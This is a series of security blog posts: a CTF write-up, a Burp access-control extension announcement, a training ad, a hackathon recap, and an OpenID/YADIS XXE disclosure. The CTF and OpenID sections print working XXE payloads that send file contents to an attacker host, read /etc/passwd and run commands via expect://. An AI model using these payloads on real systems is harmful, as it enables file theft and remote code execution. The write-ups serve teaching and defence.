We recently ran our Black Hat challenge where the ultimate prize was a seat on one of our training courses at Black Hat this year. This would allow the winner to attend any one of the following:
We started by simply trying the feature out to see how it functioned. Viewing the feed tester result, we noticed that the contents of the XML-formatted RSS feed were echoed back, and it became clear that this might be vulnerable to XXE. The first step was to try a simple XML payload such as:
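The original payload screenshot isn't reproduced here, but a classic first XXE probe against an RSS feed tester looks something like this (the target file path is just the usual first guess, not the challenge's flag):

```xml
<?xml version="1.0"?>
<!DOCTYPE rss [
  <!-- declare an external entity that the parser will expand inline -->
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<rss version="2.0">
  <channel>
    <title>&xxe;</title>
    <description>xxe probe</description>
  </channel>
</rss>
```

If the feed tester echoes the channel title back, the file contents show up right in the response.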
It looked like we had some more XML being submitted. Again we tried XXE, and found that using "file://" in our payload triggered an error. There were ways around this; however, the returned data would be truncated, and we would not be able to see the full contents of flag2.txt. When stuck with XXE and unable to see the result (or the complete result), there is always the chance of getting the data out via the network. To do this we needed a payload that would fetch an external DTD and then "submit" the contents of our target file to a server under our control. Our payload on our server looked like this:
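The exact payload isn't shown, but the standard out-of-band XXE construction works like this (the attacker host and paths below are placeholders, and the base64 filter keeps the file contents from breaking the XML). The DTD hosted on our server would look something like:

```xml
<!-- evil.dtd, served from a host we control (placeholder hostname) -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=flag2.txt">
<!ENTITY % wrap "<!ENTITY send SYSTEM 'http://attacker.example/exfil?d=%file;'>">
%wrap;
```

and the document submitted to the feed tester would pull it in:

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<data>&send;</data>
```

The external DTD is needed because parameter entities can't be used inside entity values in the internal subset; resolving `&send;` makes the parser request our URL with the file contents in the query string.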
As soon as the XML decoder parsed our malicious payload, we would receive the base64 encoded contents on our server:
Now it was a simple matter of decoding the payload and we had the second flag. This was not the only way to get flag 2! It was the most "fun" way of doing it though and used a really handy method. Remember it for your next pentest...
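Decoding the exfiltrated blob is trivial; a quick sketch (the blob value here is a made-up example, not the actual flag):

```python
import base64

# the base64 string as it arrived in our server's access log (hypothetical value)
blob = "ZmxhZ3tleGFtcGxlfQ=="

print(base64.b64decode(blob).decode())  # -> flag{example}
```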
The two runners-up, who can each claim one of our awesome 2014 t-shirts, are:
Vitaly aka @send9
Sash aka @secdefect
This is a tool that I have wanted to build for at least 5 years. Checking my archives, the earliest reference I can find is almost exactly 5 years ago, and I've been thinking about it for longer, I'm sure.
Finally it has made it out of my head, and into the real world!
Be free! Be free!
So, what does it do, and how does it do it?
The core idea for this tool comes from the realisation that, when reviewing how web applications work, it would help immensely to be able to know which user was actually making specific requests, rather than trying to just keep track of that information in your head (or not at all). Once you have an identity associated with a request, that enables more powerful analysis of the requests which have been made.
In particular, it allows the analyst to compare requests made by one user to those made by another, even as those users log in and out.
There are various ways in which users can be authenticated to web applications, and this extension doesn't try to handle them all, not just yet, anyway. It does handle the most common case, though, which is forms-based auth, with cookie-based session identifiers.
So, as a first step, it allows you to identify the "log in" action, extract the name of the user that is authenticating, and associate that identity with the session ID until it sees a "log out" action. Which is pretty useful in and of itself, I think. Who hasn't asked themselves, while reviewing a proxy history: "Now which user was I logged in as, when I made this request?" Or: "Where is that request that I made while logged in as 'admin'?"
So, how does it do this? Unfortunately, the plugin doesn't have AI, or a vast database of applications all captured for you, with details of how to identify logins and logouts. But it does have the ability to define a set of rules, so you can tell it how your app behaves. These rules can be reviewed and edited in the "Options" tab of the Identity extension.
What sort of rules do we need? Well, to start with, what constitutes a valid logon? Typically, that may include something like "A POST to a specified URL, that gets a 200 response without the text 'login failed' in it". And we need to know which form field contains the username. Oh, and the sessionid in use by the application, so that the next time we see a sessionid with the same value, we can link that same identity to that conversation as well.
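The extension's actual rule format isn't shown here, but conceptually a login rule is just a predicate over a request/response pair plus a note of which parameters carry the identity and session. A rough sketch in Python (all field names are invented for illustration, not the extension's schema):

```python
# Illustrative model of a login rule: every condition must hold (AND).
# Field names are invented for this sketch, not the extension's schema.
login_rule = {
    "method": "POST",
    "path": "/login.php",
    "status": 200,
    "response_excludes": "login failed",
    "username_param": "user",      # form field carrying the identity
    "session_param": "PHPSESSID",  # cookie that links later requests
}

def matches_login(rule, request, response):
    """Return (username, session_id) if the conversation is a successful login."""
    if request["method"] != rule["method"] or request["path"] != rule["path"]:
        return None
    if response["status"] != rule["status"]:
        return None
    if rule["response_excludes"] in response["body"]:
        return None
    return (request["params"][rule["username_param"]],
            request["cookies"][rule["session_param"]])

req = {"method": "POST", "path": "/login.php",
       "params": {"user": "admin", "pass": "secret"},
       "cookies": {"PHPSESSID": "abc123"}}
resp = {"status": 200, "body": "Welcome back!"}
print(matches_login(login_rule, req, resp))  # -> ('admin', 'abc123')
```

From that point on, any conversation carrying the same session cookie value can be tagged with the same identity.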
The easiest way to create the login rule is probably via the HTTP Proxy History tab. Just right click on a valid login request, and choose "Identity -> create login rule". It will automatically create a rule that matches the request method, request path, and the response status. Of course, you can customise it as you see fit, adding simple rules (just one condition), or complex rules (this AND that, this OR that), nested to arbitrary levels of complexity. And you can select the session id parameter name, and login parameter name on the Options tab as well.
Awesome! But how do we identify when the user logs out? Well, we need a rule for that as well, obviously. This can often be a lot simpler to identify. An easy technique is just to look for the text of the login form! If it is being displayed, you're very unlikely to be logged in, right? That can also catch the cases where a session gets timed out, but for the moment, we have separate rules and states for "logged out" and "timed out". That may not be strictly necessary, though. Again, these rules can be viewed and edited in the Options tab. Another easy way to create the logout rule is to select the relevant text in the response, right-click, and choose "Identity -> create logout rule".
Sweet! So now we can track a series of conversations from an anonymous user, through the login process, through the actions performed by the person who was logged in, through to the end of that session, whether by active logout or by inactivity and session timeout, back to an anonymous user.
Most interestingly, though, by putting the conversations into a "spreadsheet", and allowing you to create a pivot table of selected parameters vs the identity of the person making the request, it becomes possible to almost automate the testing of access control rules.
This tool is not quite at the "automated" stage yet, but it does currently allow you to see which user has performed which actions, on which subject, which makes it almost trivial to see what each user is able to do, and then formulate tests for the other users. You can also see which tests you have executed, as the various cells in the pivot table start filling up.
In this screenshot, we are pivoting on the path of the URL, the method (GET vs POST), and then a bunch of parameters. In this application (WordPress, just for demonstration purposes), we want the "action" parameter, as well as the parameter identifying the blog post being operated on. The "action" parameter can appear in the URL, or in the Body of the request, and the "post" parameter in the URL identifies the blog post, but it is called post_ID in the body. (Being able to link different parameters that mean the same thing might be a handy future development!) The resulting table creates rows for each unique parameter combination, exactly as one would expect in an Excel pivot table.
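The pivot itself is simple to model; here's a toy version in Python (the extension's internals will differ, and the conversation data is invented): rows are unique parameter combinations, columns are identities.

```python
from collections import defaultdict

# Each conversation records who made it, plus the parameters we pivot on.
# All values are invented for illustration.
conversations = [
    {"identity": "admin", "path": "/wp-admin/post.php", "method": "POST",
     "action": "editpost", "post_ID": "42"},
    {"identity": "author", "path": "/wp-admin/post.php", "method": "POST",
     "action": "editpost", "post_ID": "42"},
    {"identity": "admin", "path": "/wp-admin/post.php", "method": "POST",
     "action": "trash", "post_ID": "7"},
]

# Rows: unique (path, method, action, post) tuples; columns: identities.
pivot = defaultdict(lambda: defaultdict(list))
for c in conversations:
    row = (c["path"], c["method"], c["action"], c["post_ID"])
    pivot[row][c["identity"]].append(c)

for row, by_user in pivot.items():
    print(row, {user: len(convs) for user, convs in by_user.items()})
```

An empty cell is a test you haven't run yet: an action one identity performed that another identity hasn't attempted.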
Clicking on each cell allows you to get a list of all the conversations made by that userid, with the specific combination of parameters and values, regardless of the number of times that they had logged in and out, or how many times their session id changed. Clicking on each conversation in the list brings up the conversation details in the request/response windows at the bottom, so you can check the minutiae, and if desired, right-click and send them to the repeater for replay.
So far, the approach has been to manually copy and paste the session cookie for a different user into the repeater window before replaying the request, but this is definitely something that lends itself to automation. A future development will have an option to select "current" session tokens for identified users, and substitute those in the request before replaying it.
So far, so good! But, since the point of this extension is to check access controls, we'd ideally like to be able to say whether the replayed request was successful or not, right? There's a rule for that! Or there could be, if you defined them! By defining rules that identify "successful" requests vs "failed" requests, conversations can be tagged as successful or not, making it easier to see when reviewing lists of several conversations. Future development is intended to bring that data "up" into the pivot table too, possibly by means of colouring the cells based on the status of the conversations that match. That could end up showing a coloured matrix of successful requests for authorised users, and unsuccessful requests for unauthorised users, which, ultimately, is exactly what we want.
We'd love to hear how you get on with using this, or if you have any feature requests for the plugin. For now, the BurpId plugin is available here.
The course has undergone the full reloaded treatment, with our trainers pouring new tips, tricks and skills into the course, along with incorporating feedback from previous students.
The training introduces all the core skills required to test applications across the major mobile platforms, particularly:
For a full breakdown of the course structure, check out our BlackHat training page (https://www.blackhat.com/us-14/training/hacking-by-numbers-reloaded-mobile-bootcamp.html).
Your trainers will be Etienne (@kamp_staaldraad) and Jurgens, both of whom are crazy about mobile security and have executed numerous killshots on all the major mobile platforms.
- Etienne and Jurgens -
A few years ago we made the difficult, and sometimes painful, shift to enable remote working in preparation for the opening of our UK and Cape Town offices. Some of you probably think this is a no-brainer, but the benefit of being in the same room as your fellow hackers can't be overlooked. Being able to call everyone over to view an epic hack, or to ask for a hand when stuck is something tools like Skype fail to provide. We've put a lot of time into getting the tech and processes in place to give us the "hackers in the same room" feel, but this needs to be backed with some IRL interaction too.
People outside of our industry seem to think of "technical" people as the opposite of "creative" people. However, anyone who's slung even a small amount of code, or even dabbled in hacking will know this isn't true. We give our analysts "20% time" each month to give that creativity an outlet (or to let on-project creativity get developed further). This is part of the intention of SenseCon: a week of space and time for intense learning, building, and just plain tinkering without the stresses of report deadlines or anything else.
But ideas need input, so we try to organise someone to teach us new tricks. This year that was Schalk from House 4 Hack (these guys rock), who gave us some electronics and Arduino skills, along with some other internal training. Also, there's something about an all-nighter that drives creativity, so much so that some Plakkers used to make sure they did one at least once a month. We use our hackathon for that.
Our hackathon's setup is similar to others - you get to pitch an idea, see if you can get two other team mates on board, and have 24 hours to complete it. We had some coolness come out of this last year and I was looking forward to seeing what everyone would come up with this time round.
Copious amounts of energy drinks, snacks, biltong and chocolates were on hand, and it all kicked off after dinner together. The agreed projects are listed below, with some vagueness, since this was internal after all :)
Keiran and Dane put our office discone antenna to good use and implemented some SDR-fu to pick up aeroplane transponder signals and decode them. They didn't find MH370, but we now have a cool plane tracker for SP.
Using wifi deauth packets can be useful if you want to knock a station (or several) off a wifi network. Say you wanted to prevent some cheap wifi cams from picking you up ... Doing this right can get complicated when you're sitting a few kilometres away with a yagi and some binoculars. Charl got an Arduino to raise a flag when a station was successfully deauthed, and lower it when connectivity was restored, for use in a wifi-shootout game.
Panda (Jeremy) and Sara ended up building local Maltego transforms that would allow mass/rapid scanning of large netblocks so you can quickly zoom in on the most vulnerable boxes. No countries were harmed in the making of this.
gcp and et decided on some good ol' fashioned fuzz-n-find bug hunting on a commercial mail platform, and Websense. Along the way they learned some interesting lessons in how not to fuzz, but in the end found some coolness.
The hackathon went gangbusters; most of the team worked through the night and into the morning (I didn't; I'm getting old, and crashed at 2am). Returning that morning to see everyone still hacking away on their projects (and a few hacking away at their snoring) was amazing.
Once the 24 hours were up, many left the office to grab a shower and freshen up before presenting to the entire company later that afternoon.
Overall, this year's SenseCon was a great success. Some cool projects/ideas were born, a good time was had, AND we even made Charl feel young again. As the kids would say, #winning.
Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.
The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this, the server contacts the identity server specified by the user, downloads information regarding the identity endpoint, and proceeds with authentication. There are two ways a site may do this discovery: either through HTML or through YADIS discovery. Now this is where it gets interesting. The HTML look-up is simply an HTML document with some meta information contained in the head tags:
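The original screenshot is missing, but per the OpenID 2.0 spec, HTML-based discovery boils down to a couple of link elements in the head (URLs here are placeholders):

```html
<html>
  <head>
    <!-- OpenID 2.0 discovery tags -->
    <link rel="openid2.provider" href="https://openid.example.com/server">
    <link rel="openid2.local_id" href="https://openid.example.com/user/alice">
    <!-- OpenID 1.x equivalents -->
    <link rel="openid.server" href="https://openid.example.com/server">
    <link rel="openid.delegate" href="https://openid.example.com/user/alice">
  </head>
  <body>alice's identity page</body>
</html>
```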
Whereas the Yadis discovery relies on an XRDS document:
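Again the original example image is missing; a minimal benign XRDS document looks roughly like this (endpoint URL is a placeholder):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>https://openid.example.com/server</URI>
    </Service>
  </XRD>
</xrds:XRDS>
```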
Now if you have been paying attention, the potential for exploitation should be jumping out at you. XRDS is simply XML and, as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that, when processed by an XML parser, get interpreted and 'executed'.
From the description given by Reginaldo, the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery against a host we control. Our host would serve a tainted XRDS, and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well-formed XML and would not cause the parser to fail (a quick check can be done using http://www.xmlvalidation.com/index.php).
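The PoC itself isn't reproduced in this copy of the post; a reconstruction matching the description would look something like the following (the attacker hostname stands in for the redacted IP):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xrds:XRDS [
  <!-- external entity pointing back at our server; host is a placeholder -->
  <!ENTITY a SYSTEM "http://attacker.example:7806/success.txt">
]>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <!-- first Service: a valid OpenID discovery entry -->
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>https://openid.example.com/server</URI>
    </Service>
    <!-- second Service: the XXE trigger -->
    <Service priority="1">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>&a;</URI>
    </Service>
  </XRD>
</xrds:XRDS>
```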
In our example, the first <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, open-source social platform that allowed OpenID authentication. And then we tried out our PoC.
It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the entity declaration for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This causes the PHP filter function to be applied to our input stream (the file read) before the text is rendered. This served two purposes: firstly, to ensure the file we were reading did not introduce any XML parsing errors, and secondly, to make the output a little more user-friendly.
The first run with this modified payload didn't yield the expected results; it simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. After a quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately, this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS), and the result was returned in the URL.
Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.
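Pulling the blob out of the return URL and decoding it is a couple of lines of Python; the URL and parameter name below are hypothetical stand-ins for the platform's actual redirect:

```python
import base64
from urllib.parse import urlparse, parse_qs

# Hypothetical return URL: the claimed_id parameter carries the base64 blob
url = ("http://victim.example/openid/finish_auth"
       "?claimed_id=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA==")

blob = parse_qs(urlparse(url).query)["claimed_id"][0]
print(base64.b64decode(blob).decode())  # -> root:x:0:0:root:/root:/bin/bash
```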
This left us with the ability to read *any* file on the filesystem, provided we knew the path and the web server user had permission to access it. In the case of this particular platform, an interesting file to read would be config.php, which yields the admin username and password as well as the MySQL database credentials. The final trick was to try to turn this into RCE, as was hinted in the Facebook disclosure. As the platform was written in PHP, we could use the expect:// handler to execute code: <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (http://de2.php.net/manual/en/expect.installation.php). I'm not too sure how often this is the case, but other attempts at RCE haven't been too successful. Armed with our new XRDS document, we re-enacted our steps from above and ended up with code execution.
And Boom goes the dynamite.
All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser:
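The setting itself is missing from this copy of the post; at the time of writing (PHP 5.x era), the usual mitigation for libxml-based parsers was:

```php
<?php
// Disable loading of external entities by the default libxml-based parsers.
// (Note: deprecated as of PHP 8.0, where external entity loading is
// disabled by default with libxml2 >= 2.9.)
libxml_disable_entity_loader(true);
```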
A good document with PHP security tips can be found here: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html